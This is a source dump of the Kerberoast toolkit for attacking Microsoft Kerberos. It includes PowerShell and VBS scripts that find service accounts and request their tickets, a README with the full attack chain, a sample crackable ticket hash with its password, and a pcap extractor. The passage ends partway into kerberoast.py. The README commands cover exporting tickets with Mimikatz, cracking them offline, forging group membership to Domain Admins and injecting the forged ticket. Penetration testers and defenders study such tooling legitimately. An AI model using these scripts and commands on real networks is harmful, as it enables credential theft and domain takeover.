├── GetUserSPNs.ps1
├── GetUserSPNs.vbs
├── LICENSE
├── README.md
├── examples
    ├── MSSQLSvc-sql01.medin.local.kirbi
    ├── README.md
    └── john-hashcat-crackfile.txt
├── extracttgsrepfrompcap.py
├── kerberoast.py
├── kerberos.py
├── kirbi2john.py
├── krbroast-pcap2hashcat.py
├── pac.py
└── tgsrepcrack.py


/GetUserSPNs.ps1:
--------------------------------------------------------------------------------
  1 | # Edits by Tim Medin
  2 | # File:     GetUserSPNS.ps1
  3 | # Contents: Query the domain to find SPNs that use User accounts
  4 | # Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast
  5 | #           The password hash used with Computer accounts are infeasible to 
  6 | #           crack; however, if the User account associated with an SPN may have
  7 | #           a crackable password. This tool will find those accounts. You do not
  8 | #           need any special local or domain permissions to run this script. 
  9 | #           This script on a script supplied by Microsoft (details below).
 10 | # History:  2016/07/07     Tim Medin    Add -UniqueAccounts parameter to only get unique SAMAccountNames
 11 | #           2016/04/12     Tim Medin    Added -Request option to automatically get the tickets
 12 | #           2014/11/12     Tim Medin    Created
 13 | 
 14 | [CmdletBinding()]
 15 | Param(
 16 |   [Parameter(Mandatory=$False,Position=1)] [string]$GCName,
 17 |   [Parameter(Mandatory=$False)] [string]$Filter,
 18 |   [Parameter(Mandatory=$False)] [switch]$Request,
 19 |   [Parameter(Mandatory=$False)] [switch]$UniqueAccounts
 20 | )
 21 | 
 22 | Add-Type -AssemblyName System.IdentityModel
 23 | 
 24 | $GCs = @()
 25 | 
 26 | If ($GCName) {
 27 |   $GCs += $GCName
 28 | } else { # find them
 29 |   $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
 30 |   $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
 31 |   ForEach ($GC in $CurrentGCs) {
 32 |     #$GCs += $GC.Name
 33 |     $GCs += $ForestInfo.ApplicationPartitions[0].SecurityReferenceDomain
 34 |   }
 35 | }
 36 | 
 37 | if (-not $GCs) {
 38 |   # no Global Catalogs Found
 39 |   Write-Host "No Global Catalogs Found!"
 40 |   Exit
 41 | }
 42 | 
 43 | <#
 44 | Things you can extract
 45 | Name                           Value
 46 | ----                           -----
 47 | admincount                     {1}
 48 | samaccountname                 {sqlengine}
 49 | useraccountcontrol             {66048}
 50 | primarygroupid                 {513}
 51 | userprincipalname              {sqlengine@medin.local}
 52 | instancetype                   {4}
 53 | displayname                    {sqlengine}
 54 | pwdlastset                     {130410454241766739}
 55 | memberof                       {CN=Domain Admins,CN=Users,DC=medin,DC=local}
 56 | samaccounttype                 {805306368}
 57 | serviceprincipalname           {MSSQLSvc/sql01.medin.local:1433, MSSQLSvc/sql01.medin.local}
 58 | usnchanged                     {135252}
 59 | lastlogon                      {130563243107145358}
 60 | accountexpires                 {9223372036854775807}
 61 | logoncount                     {34}
 62 | adspath                        {LDAP://CN=sqlengine,CN=Users,DC=medin,DC=local}
 63 | distinguishedname              {CN=sqlengine,CN=Users,DC=medin,DC=local}
 64 | badpwdcount                    {0}
 65 | codepage                       {0}
 66 | name                           {sqlengine}
 67 | whenchanged                    {9/22/2014 6:45:21 AM}
 68 | badpasswordtime                {0}
 69 | dscorepropagationdata          {4/4/2014 2:16:44 AM, 4/4/2014 12:58:27 AM, 4/4/2014 12:37:04 AM,...
 70 | lastlogontimestamp             {130558419213902030}
 71 | lastlogoff                     {0}
 72 | objectclass                    {top, person, organizationalPerson, user}
 73 | countrycode                    {0}
 74 | cn                             {sqlengine}
 75 | whencreated                    {4/4/2014 12:37:04 AM}
 76 | objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 191 250 179 30 180 59 104 26 248 205 17...
 77 | objectguid                     {101 165 206 61 61 201 88 69 132 246 108 227 231 47 109 102}
 78 | objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=medin,DC=local}
 79 | usncreated                     {57551}
 80 | #>
 81 | 
 82 | ForEach ($GC in $GCs) {
 83 |     $searcher = New-Object System.DirectoryServices.DirectorySearcher
 84 |     $searcher.SearchRoot = "LDAP://" + $GC
 85 |     $searcher.PageSize = 1000
 86 |     $searcher.Filter = "(&(!objectClass=computer)(servicePrincipalName=*))"
 87 |     $searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
 88 |     $searcher.PropertiesToLoad.Add("name") | Out-Null
 89 |     $searcher.PropertiesToLoad.Add("samaccountname") | Out-Null
 90 |     #$searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
 91 |     #$searcher.PropertiesToLoad.Add("displayname") | Out-Null
 92 |     $searcher.PropertiesToLoad.Add("memberof") | Out-Null
 93 |     $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
 94 |     #$searcher.PropertiesToLoad.Add("distinguishedname") | Out-Null
 95 | 
 96 |     $searcher.SearchScope = "Subtree"
 97 | 
 98 |     $results = $searcher.FindAll()
 99 |     
100 |     [System.Collections.ArrayList]$accounts = @()
101 |         
102 |     foreach ($result in $results) {
103 |         foreach ($spn in $result.Properties["serviceprincipalname"]) {
104 |             $o = Select-Object -InputObject $result -Property `
105 |                 @{Name="ServicePrincipalName"; Expression={$spn.ToString()} }, `
106 |                 @{Name="Name";                 Expression={$result.Properties["name"][0].ToString()} }, `
107 |                 #@{Name="UserPrincipalName";   Expression={$result.Properties["userprincipalname"][0].ToString()} }, `
108 |                 @{Name="SAMAccountName";       Expression={$result.Properties["samaccountname"][0].ToString()} }, `
109 |                 #@{Name="DisplayName";         Expression={$result.Properties["displayname"][0].ToString()} }, `
110 |                 @{Name="MemberOf";             Expression={$result.Properties["memberof"][0].ToString()} }, `
111 |                 @{Name="PasswordLastSet";      Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
112 |                 #@{Name="DistinguishedName";   Expression={$result.Properties["distinguishedname"][0].ToString()} }
113 |             if ($UniqueAccounts) {
114 |                 if (-not $accounts.Contains($result.Properties["samaccountname"][0].ToString())) {
115 |                     $accounts.Add($result.Properties["samaccountname"][0].ToString()) | Out-Null
116 |                     $o
117 |                     if ($Request) {
118 |                         New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
119 |                     }
120 |                 }
121 |             } else {
122 |                 $o
123 |                 if ($Request) {
124 |                     New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
125 |                 }
126 |             }
127 |         }
128 |     }
129 | }
130 | 


--------------------------------------------------------------------------------
/GetUserSPNs.vbs:
--------------------------------------------------------------------------------
 1 | ' Edits by Tim Medin
 2 | ' File:     GetUserSPNS.vbs
 3 | ' Contents: Query the domain to find SPNs that use User accounts
 4 | ' Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast
 5 | '           The password hash used with Computer accounts are infeasible to 
 6 | '           crack; however, if the User account associated with an SPN may have
 7 | '           a crackable password. This tool will find those accounts. You do not
 8 | '           need any special local or domain permissions to run this script. 
 9 | '           This script on a script supplied by Microsoft (details below).
10 | ' History:    2014/11/12     Tim Medin    Created
11 | '
12 | ' Original Script Details:
13 | ' Copyright (c) Microsoft Corporation 2004 -
14 | ' File:                querySpn.vbs
15 | ' Contents:     Query a given SPN in a given forest to find the owners
16 | ' History:         7/7/2004     Craig Wiand     Created        
17 | 
18 | Option Explicit         
19 | Dim oConnection, oCmd, oRecordSet
20 | Dim oGC, oNSP
21 | Dim strGCPath, strClass, strADOQuery
22 | Dim vObjClass, vSPNs, vName
23 | 
24 | ParseCommandLine()
25 | 
26 | '--- Set up the connection ---
27 | Set oConnection = CreateObject("ADODB.Connection")
28 | Set oCmd = CReateObject("ADODB.Command")
29 | oConnection.Provider = "ADsDSOObject"
30 | oConnection.Open "ADs Provider"
31 | Set oCmd.ActiveConnection = oConnection
32 | oCmd.Properties("Page Size") = 1000
33 | 
34 | '--- Build the query string ---
35 | strADOQuery = "<" + strGCPath + ">;(&(!objectClass=computer)(servicePrincipalName=*));" & _
36 |         "dnsHostName,distinguishedName,servicePrincipalName,objectClass," & _
37 |                 "samAccountName;subtree"
38 | oCmd.CommandText = strADOQuery
39 | 
40 | '--- Execute the query for the object in the directory ---
41 | Set oRecordSet = oCmd.Execute
42 | If oRecordSet.EOF and oRecordSet.Bof Then
43 |   Wscript.Echo "No SPNs found!"
44 |   Wscript.Quit 0
45 | End If
46 | 
47 | While Not oRecordset.Eof
48 |   Wscript.Echo oRecordset.Fields("distinguishedName")
49 |   'vObjClass = oRecordset.Fields("objectClass")
50 |   'strClass = vObjClass( UBound(vObjClass) )
51 |   'Wscript.Echo "Class: " & strClass
52 |   If UCase(strClass) = "COMPUTER" Then
53 |     Wscript.Echo "Computer DNS: " & oRecordset.Fields("dnsHostName")
54 |   Else
55 |     Wscript.Echo "User Logon: " & oRecordset.Fields("samAccountName")
56 |   End If
57 | 
58 |   '--- Display the SPNs on the object --- 
59 |   vSPNs = oRecordset.Fields("servicePrincipalName")
60 |   For Each vName in vSPNs
61 |     Wscript.Echo "-- " + vName
62 |   Next
63 |   Wscript.Echo
64 |   oRecordset.MoveNext
65 | Wend
66 | 
67 | oRecordset.Close
68 | oConnection.Close
69 | 
70 | Sub ShowUsage()
71 |      Wscript.Echo " USAGE:        " & WScript.ScriptName & " SpnToFind [GC Servername or Forestname]"
72 |      Wscript.Echo
73 |      Wscript.Echo "                     " & WScript.ScriptName
74 |      Wscript.Echo "                     " & WScript.ScriptName & " Corp.com"
75 |      Wscript.Quit 0
76 | End Sub
77 | 
78 | Sub ParseCommandLine()
79 |   If WScript.Arguments.Count = 1 Then
80 |     If WScript.Arguments(0) = "-h" Or WScript.Arguments(0) = "--help" Or WScript.Arguments(0) = "-?" Or WScript.Arguments(0) = "/?" Then
81 |         ShowUsage()
82 |     Else
83 |       strGCPath = "GC://" & WScript.Arguments(1)
84 |     End If
85 |   ElseIf WScript.Arguments.Count = 0 Then
86 |     ' Set the GC
87 |     Set oNSP = GetObject("GC:")
88 |     For Each oGC in oNSP
89 |         strGCPath = oGC.ADsPath
90 |     Next
91 |   Else
92 |       ShowUsage()
93 |   End If
94 | 
95 | End Sub


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "{}"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright {yyyy} {name of copyright owner}
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 
203 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | kerberoast
 2 | ==========
 3 | 
 4 | Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.
 5 | 
 6 | Extract all accounts in use as SPN using built in MS tools
 7 | ----------------------------------------------------------
 8 | ```
 9 | PS C:\> setspn -T medin -Q */*
10 | ```
11 | 
12 | Request Ticket(s)
13 | -----------------
14 | One ticket:  
15 | ```
16 | PS C:\> Add-Type -AssemblyName System.IdentityModel  
17 | PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  
18 | ```
19 | 
20 | All the tickets
21 | ```
22 | PS C:\> Add-Type -AssemblyName System.IdentityModel  
23 | PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  
24 | ```
25 | 
26 | Extract the acquired tickets from ram with Mimikatz
27 | ---------------------------------------------------
28 | ```
29 | mimikatz # kerberos::list /export
30 | ```
31 | 
32 | Crack with tgsrepcrack
33 | ----------------------
34 | ```
35 | ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
36 | ```
37 | 
38 | Rewrite
39 | -------
40 | Make user appear to be a different user  
41 | ```
42 | ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  
43 | ```
44 | 
45 | Add user to another group (in this case Domain Admin)  
46 | ```
47 | ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  
48 | ```
49 | Inject back into RAM with Mimikatz
50 | ----------------------------------
51 | ```
52 | kerberos::ptt sql.kirbi
53 | ```
54 | 


--------------------------------------------------------------------------------
/examples/MSSQLSvc-sql01.medin.local.kirbi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nidem/kerberoast/cc5aa6e88279954fa506830a57e1d63da03dbecd/examples/MSSQLSvc-sql01.medin.local.kirbi


--------------------------------------------------------------------------------
/examples/README.md:
--------------------------------------------------------------------------------
1 | Password for these tickets is: phoenix1


--------------------------------------------------------------------------------
/examples/john-hashcat-crackfile.txt:
--------------------------------------------------------------------------------
1 | $krb5tgs$23$*3-40a10000-tm@MSSQLSvc~sql01.medin.local~1433-MEDIN.LOCAL*$af6661cfa32b04770f32d452280e7da0$30e997a75550ff68c0acfa6ad03021423224f16fd4acbb47ea8bb124d9a0fc120f5dc6ade8a79dce3e00626e16631fcf116c20e7341e9e563186399c4951a7702f2e2a68141700f2d55a783044a13a2e45842c68678f7621eb89ecf2982dab77e3802399e57aa453f4efd3a8103e4c2ac9b6a6ec6887fa30a355ee0524613fcc61a4bc0de7dac5a36c25c252955cca4d79350d3e7c6f4042ff999c352f32ec739ee6eb65c10e667d283343c5e40d90c15ba6e861abcc7069f14232007a2ddd8a88d7713b1cff7daa7378247ced1f2c8a26dc85409bf4faff4f791c5259cc75479ee74e22d7e52782001941a8b2fd70d791ec37ea2244a99e7cffd12b579e8ea76809e1324c548e2e0492fcfa32248b5b3097c1ec5226dd9014c9cf041b3a20b18d14d863ab9f7d7dfe8a70356a43395d277861afb66971a46d86ae51de7c2f23436f16f3fd56a22111715717cada56047f51c0326e1dd0d9cb32a0df0d3481d1d234f2b9781243e81d36ad3d52eb0b1ba92f07996085624ca438b073bdbaece9f7edf029c2a5e3b2725c7aa1a1ef2a7aacf8d7012c6a543b00f08976c0ef3911721b12211ce895c3130ee0057768b370ac85a4504869a31d1585cd42773dfd4e4d35c7cb3e4d70cb245130307f3057c38daf6a501752ba50fabb82ccb1b52015b3f87b795bbd9548f67cf520193ddc0ebcbbca375041bc02644b18f788ce876e3d6140902db96a5f5ae6fbc7a01becc9039c2907a60bf9287d7b85dd38d4ff94068a04e081f11baa730faabbe5fcc85ba6d7427cf4295179e789922631102ab40024d0b68c6390ba828f07d6186eb0c583a93da07f2e69d28c743df7288e097f931843e70957d603d001272a42ab224c66040173018bfebfedc6d772524fa41ffafdbd2082bdf07188a0026d3e53e051c08b9c0eb21ccecbd3a5404eb82ae4656d2417da66e26cf416ca3b74e4134f07ecb0a1a509e0b2ac894eed6c2b05a00089de70b7db556160355b07c9bad845b82659f6c57932c1e2d97d2522f957bb9445253d5a252c1a8ca78700a2d676fb1aafa7938b03ba270030d4b80af6e413b12e7a975efbc7165a3635e3b543f00280c9434a46ddde306f6676e726a21a645dc070d9cfdaadbe6f0985fb61f3c49430350203b91a61ad44820bff4993f7d5cdc50fcc20904cbd00b3dd4ea49ae41cd85bcb9fe852fce6265b66cd52005b7389ef9954279725f992cc70aa8e3fdd30008f2b064e533f578e1c3d428c2c2fd5b641b6b3d11c05e3a768180347a3645941fdd5f064bbb2bb59e514ff3605d7bc268cc7e8fcf0fb0757c41cc5b64824c54ef917de42e62bdddb973e13f0b1b9bf3f5dbc3df9f88ab0168572d505bb0e179dbff3c53b4fb043b912b8a65a047f58c0c60bdf4f583ab96d
2 | 


--------------------------------------------------------------------------------
/extracttgsrepfrompcap.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3 -tt
 2 | 
 3 | from scapy.all import *
 4 | import struct
 5 | 
 6 | MESSAGETYPEOFFSETUDP = 17
 7 | MESSAGETYPEOFFSETTCP = 21
 8 | DEBUG = True
 9 | 
10 | TGS_REP = 13
11 | 
12 | def findkerbpayloads(packets, verbose=False):
13 | 	kploads = []
14 | 	i = 1
15 | 	unfinished = {}
16 | 	for p in packets:
17 | 		# UDP
18 | 		if p.haslayer(UDP) and p.sport == 88 and p[UDP].load[MESSAGETYPEOFFSETUDP] == TGS_REP:
19 | 			if verbose: print("found UDP payload of size %i" % len(p[UDP].load)) 
20 | 			kploads.append(p[UDP].load)
21 | 
22 | 		#TCP
23 | 		elif p.haslayer(TCP) and p.sport == 88 and p[TCP].flags & 23== 16: #ACK Only, ignore push (8), urg (32), and ECE (64+128)
24 | 			# assumes that each TCP packet contains the full payload
25 | 
26 | 			try:
27 | 				payload = p[TCP].load
28 | 			except:
29 | 				continue
30 | 
31 | 			if len(payload) > MESSAGETYPEOFFSETTCP and payload[MESSAGETYPEOFFSETTCP] == TGS_REP:
32 | 				# found start of new TGS-REP
33 | 				size = struct.unpack(">I", payload[:4])[0]
34 | 				if size + 4 == len(payload):
35 | 					kploads.append(payload[4:size+4]) # strip the size field
36 | 				else:
37 | 					#print 'ERROR: Size is incorrect: %i vs %i' % (size, len(payload))
38 | 					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (payload[4:size+4], size)
39 | 				if verbose: print ("found TCP payload of size %i" % size)
40 | 			elif (p[IP].src, p[IP].dst, p[TCP].dport) in unfinished:
41 | 				ticketdata, size = unfinished.pop((p[IP].src, p[IP].dst, p[TCP].dport))
42 | 				ticketdata += payload
43 | 				#print "cont: %i %i" % (len(ticketdata), size)
44 | 				if len(ticketdata) == size:
45 | 					kploads.append(ticketdata)
46 | 				elif len(ticketdata) < size:
47 | 					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (ticketdata, size)
48 | 				else:
49 | 					# OH NO! Oversized!
50 | 					print('Too much data received! Source: %s Dest: %s DPort %i' % (p[IP].src, p[IP].dst, p[TCP].dport))
51 | 
52 | 
53 | 	return kploads
54 | 
55 | 
56 | 
57 | if __name__ == '__main__':
58 | 	import argparse
59 | 
60 | 	parser = argparse.ArgumentParser(description='Find TGS_REP packets in a pcap file and write them for use cracking')
61 | 	parser.add_argument('-f', '--pcap', dest='pcaps', action='append', required=True,
62 | 					metavar='PCAPFILE', #type=file, #argparse.FileType('r'), 
63 | 					help='a file to search for Kerberos TGS_REP packets')
64 | 	parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True, 
65 | 					metavar='OUTPUTFILE', type=argparse.FileType('w'), 
66 | 					help='the output file')
67 | 	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', default=False,
68 | 					help='display verbose messages')
69 | 
70 | 	args = parser.parse_args()
71 | 	kploads = []
72 | 	for f in args.pcaps:
73 | 		packets = rdpcap(f)
74 | 		kploads += findkerbpayloads(packets, args.verbose)
75 | 	if len(kploads) == 0:
76 | 		print('no payloads found')
77 | 	else:
78 | 		print('writing %i hex encoded payloads to %s' % (len(kploads), args.outfile.name))
79 | 	for p in kploads:
80 | 		args.outfile.write(p.hex() + '\n')
81 | 
82 | 	
83 | 
84 | 


--------------------------------------------------------------------------------
/kerberoast.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3 -tt
  2 | 
  3 | import kerberos
  4 | from pyasn1.codec.ber import encoder, decoder
  5 | from pyasn1.type import univ, useful
  6 | import struct
  7 | import datetime
  8 | import re
  9 | import pac
 10 | 
 11 | 
 12 | def walk(t):
 13 | 	if type(t) == str:
 14 | 		print('String: %s' % t)
 15 | 	else:
 16 | 		print('Length: %i' % len(t))
 17 | 		for i in range(len(t)):
 18 | 			print('---%i---' % i)
 19 | 			print(t[i])
 20 | 
 21 | 
 22 | #Sequence().setComponentByPosition(0, BitString("'01000000101000010000000000000000'B")).setComponentByPosition(1, Sequence().setComponentByPosition(0, Integer(23)).setComponentByPosition(1, OctetString(hexValue='dfa121845d72f43271bbb33cd9e69443'))).setComponentByPosition(2, GeneralString('MEDIN.LOCAL')).setComponentByPosition(3, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, Sequence().setComponentByPosition(0, GeneralString('tm')))).setComponentByPosition(4, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, OctetString(''))).setComponentByPosition(5, GeneralizedTime('20140403172846Z')).setComponentByPosition(6, GeneralizedTime('20140403173119Z'))
 23 | def updatetimestampsserverticket(ticket, authtime=None, starttime=None, endtime=None, renewtiltime=None):
 24 | 	now = datetime.datetime.now()
 25 | 	# yes, this regex isn't perfect, but neither are you
 26 | 	if not authtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', authtime):
 27 | 		authtime = now.strftime('%Y%m%d%H%M%SZ')
 28 | 	if not starttime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', starttime):
 29 | 		starttime = now.strftime('%Y%m%d%H%M%SZ')
 30 | 	if not endtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', endtime):
 31 | 		endtime = (now + datetime.timedelta(hours=10)).strftime('%Y%m%d%H%M%SZ')
 32 | 	if not renewtiltime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', renewtiltime):
 33 | 		renewtiltime = (now + datetime.timedelta(hours=24)).strftime('%Y%m%d%H%M%SZ')
 34 | 
 35 | 	# Dear, pyasn1 
 36 | 	# Why do I have to use a _ method to update a value. You expect me to write
